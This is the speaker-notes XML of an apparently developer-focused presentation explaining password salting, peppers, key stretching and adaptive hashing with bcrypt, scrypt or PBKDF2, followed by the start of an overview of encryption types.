            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A salt is some random data that's appended to a password before it's hashed, that's different every time. That means a salt should never be re-used, and shouldn't be the same for every user on your site (I'll talk more about this in a moment).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>It's very important that the salt is different every time you create or change a password. Why?</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4" name="Shape 844"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="845" name="Shape 845"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let's look at a typical example of how it works. I would take the user's password, append a random piece of data to it (that's the salt), and hash it the same way you would have hashed the password.</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5" name="Shape 865"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="866" name="Shape 866"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Where this really comes into play is when you have two users with the same password. Since the salt is going to be different every time, that means two users with the same password will now get a completely different hash result at the end of it all.</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8" name="Shape 878"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="879" name="Shape 879"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>In our database, we would store the salt, along with the resulting hash. We store the salt so that we can still verify that a user has entered the correct password. So why bother with a salt at all? If an attacker has access to it, how does this help us?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Well, every one of the users in this database has exactly the same password. But because of salts, the resultant hash is different for everyone. This means you can no longer use a rainbow table to crack these passwords, since you'd have to make a custom rainbow table for each user (at which point you may as well just brute force things).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7" name="Shape 887"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="888" name="Shape 888"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Thanks to using a salt, we've now made rainbow table attacks completely useless. This is why the salt </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:t> be different for every single password, otherwise it defeats the point.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6" name="Shape 896"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897" name="Shape 897"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>You’ll notice that the salt was in plaintext in the database I showed, and that’s exactly as it should be. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Salts are not secrets</a:t>
            </a:r>
            <a:r>
              <a:t> and should not be treated as such. They’re there to make rainbow table attacks infeasible, nothing more. Remember, that what we're doing here isn’t encryption, the salt is not a secret key or anything like that.</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9" name="Shape 909"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="910" name="Shape 910"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>There's also another piece of data that can be used to make password storage stronger. This is called a "Pepper", or I've sometimes seen it referred to as a "Site-wide Salt". A pepper is a piece of random data that's appended to every password, similar to how the salt was, however the difference is that the pepper is the same for everyone and isn't stored in the database. The pepper is treated as a secret and is kept on disk, or as part of whatever secret storage solution you happen to be using.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Why is a pepper useful? Well, in order to be able to try and brute force any stolen hashes, you’d need not only the database (which has the salt), but also the pepper. If you’ve stolen the database via SQL injection, it’s unlikely (but not impossible) you can also steal the pepper which is stored on disk. It can make it more difficult for an attacker, but it can also make it more difficult for you too. For example, rotating a compromised pepper can be a difficult challenge, and generally you just have to keep track of every pepper you’ve ever had.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8" name="Shape 928"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="929" name="Shape 929"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So if you wanted to use a pepper, the process would now look like this. You take the password, append the salt, append the pepper, and then hash that. That would then be the result you store in your database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Whether you use a pepper or not though, there's still more to do.</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7" name="Shape 937"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="938" name="Shape 938"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We still have a problem...if someone is able to steal the database and the pepper, they are still able to brute force those passwords just by trying every combination. They can't pre-compute them into a rainbow table, but they can do them in realtime.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Why is this possible? Because hashing is too fast! So far I've only shown you general purpose hashing functions, MD5, SHA-1, etc. The original purpose of these algorithms is to quickly compute a value so that you can use it to check and verify the integrity of a file. In those cases, you want it to be as fast as possible. But they weren't designed for secure password storage, where speed means that an attacker can try more combinations more quickly.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I’m going to be covering a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>lot</a:t>
            </a:r>
            <a:r>
              <a:t> of different topics. Don't be put off by the quantity here, some I’ll go into quite a bit of depth on, but others I’ll just be touching on briefly. Some of these may already be familiar to you, but hopefully you’ll still learn something new if that's the case.</a:t>
            </a:r>
          </a:p>
          <a:p>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1" name="Shape 961"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="962" name="Shape 962"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So there's another step we need to make here. We want to slow down how quickly our hashing works. We typically don't like to slow things down as engineers, but in this case it's warranted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If it takes 1 second for a user to be able to login, the user isn't really going to notice. But an attacker who wants to try to guess passwords, only being able to try 1 every second is going to make it very tedious for them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The way we slow it down is by just running the hashing algorithm multiple times (called rounds). Each iteration should rely on the output of the previous one so that it can't be parallelized. We're not just spinning CPU cycles here, we are actually calculating something. This process is called "Key Stretching".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>In this example, we're going to run the hash 100,000 extra times.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3" name="Shape 973"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="974" name="Shape 974"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Why do we do this? Well, because we’ve just made it 100,000 times harder for an attacker to brute force those passwords offline. Before they could try 100,000 passwords a second. Now they can only try one. For a user, this isn't a big deal, but for an attacker, we've just make it much more painful for them.</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5" name="Shape 985"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="986" name="Shape 986"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Unfortunately, we still have a problem. Hardware is always getting better. What's true today, might not be true in a year's time. An attacker might break out some GPUs and instead of mining Bitcoin, maybe they'll start hashing passwords instead. So how can we keep up?</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7" name="Shape 997"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="998" name="Shape 998"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We need to use something called adaptive hashing instead.</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7" name="Shape 1007"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1008" name="Shape 1008"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Basically, adaptive hashing is the ability to change the number of rounds as time goes on. But 'rounds' are a strange concept, the speed is based on how fast your CPU is. So let's put this into other terms.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7" name="Shape 1017"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1018" name="Shape 1018"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Instead, what we really care about is the cost, or effort involved. There are algorithms where you can specify a "work factor", or "cost" value. Since what we really care about is how much time and money it's going to take an attacker to crack your passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>There's a great table here showing the different costs associated with cracking passwords using various different algorithms. PBKDF2, bcrypt, and scrypt are all purpose-built password hashing algorithms. They were designed specifically for passwords, so unlike MD5 or SHA-1, they are purposefully slower.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>They also do pretty much everything I just talked about automatically. Salting and key stretching are built-in.</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7" name="Shape 1027"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="Shape 1028"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So the key takeaway here is to use an adaptive hashing algorithm specifically designed for storing passwords. bcrypt, scrypt, or PBKDF2 are all good choices. We use bcrypt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>It's also important to reevaluate your "cost" value every so often. It's no good just setting a cost factor and leaving it for years, because eventually hardware will catch up.</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7" name="Shape 1037"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1038" name="Shape 1038"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Here's an example of how to use bcrypt in Ruby. That $ delimeted string it gives you has all of the necessary information as part of it. The algorithm being used 2a, the cost/work factor 13, and a salt and resultant hash. So it takes care of all the details for you.</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7" name="Shape 1047"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048" name="Shape 1048"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>If you want to know more about these algorithms, here are links to their wiki pages.</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6" name="Shape 1056"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1057" name="Shape 1057"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>OK, it's time for our next topic, encryption.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But I want to kick things off with some quick warnings...</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6" name="Shape 1066"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Shape 1067"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Hopefully you should all be familiar with what encryption is, but if not, encryption is about encoding information in such a way that only authorized parties can read it.</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6" name="Shape 1076"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077" name="Shape 1077"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The biggest problem with encryption is that it’s very easy to convince yourself your encryption is great. It's easy to come up with an encryption scheme you yourself can't break. It doesn't mean that no one else can.</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6" name="Shape 1086"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1087" name="Shape 1087"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>For this reason, the best encryption advice is to never write your own encryption. Ever (Well.. unless it's actually your job). Leave it to the experts who do it for a living. Use a library, or pre-defined encryption algorithms. This is one area you want to very much leave to the professionals.</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5" name="Shape 1095"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1096" name="Shape 1096"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>There are various different types of encryption, each suitable for different tasks.</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4" name="Shape 1104"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1105" name="Shape 1105"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let’s try and translate these into plain English.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Symmetric/Asymmetric</a:t>
            </a:r>
            <a:r>
              <a:t> refers to whether the key used to encrypt and decrypt the message is the same or different. So if the same key can both encrypt and decrypt the data, it's symmetric. If they're different, it's asymmetric.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>block cipher</a:t>
            </a:r>
            <a:r>
              <a:t> is a type of encryption where the data is encrypted in chunks. Most of the encryption algorithms you've probably heard about are block ciphers; DES, AES, etc. They also have various different modes of operation, CBC, GCM, etc. I'm not going to go into all the different modes, since we'll be here all day, but you can read more about them on wikipedia.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Public/Private key</a:t>
            </a:r>
            <a:r>
              <a:t> encryption is where you have a private key, and everyone else has a public key. This allows anyone to encrypt a message to you, that only you can decrypt. It also allows you to sign pieces of data, and everyone else can verify that you were the one who signed it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Stream ciphers</a:t>
            </a:r>
            <a:r>
              <a:t> are where the data is encrypted "on-the-fly" as a raw data stream, rather than in blocks like a block cipher.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>There are various details and differences between types, and a lot more examples. This is a huge field of study, and as much as I would love to cover it all, we need to stop somewhere. So these are the main types you are likely to come across.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>We need to use encryption for two important things...</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3" name="Shape 1113"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
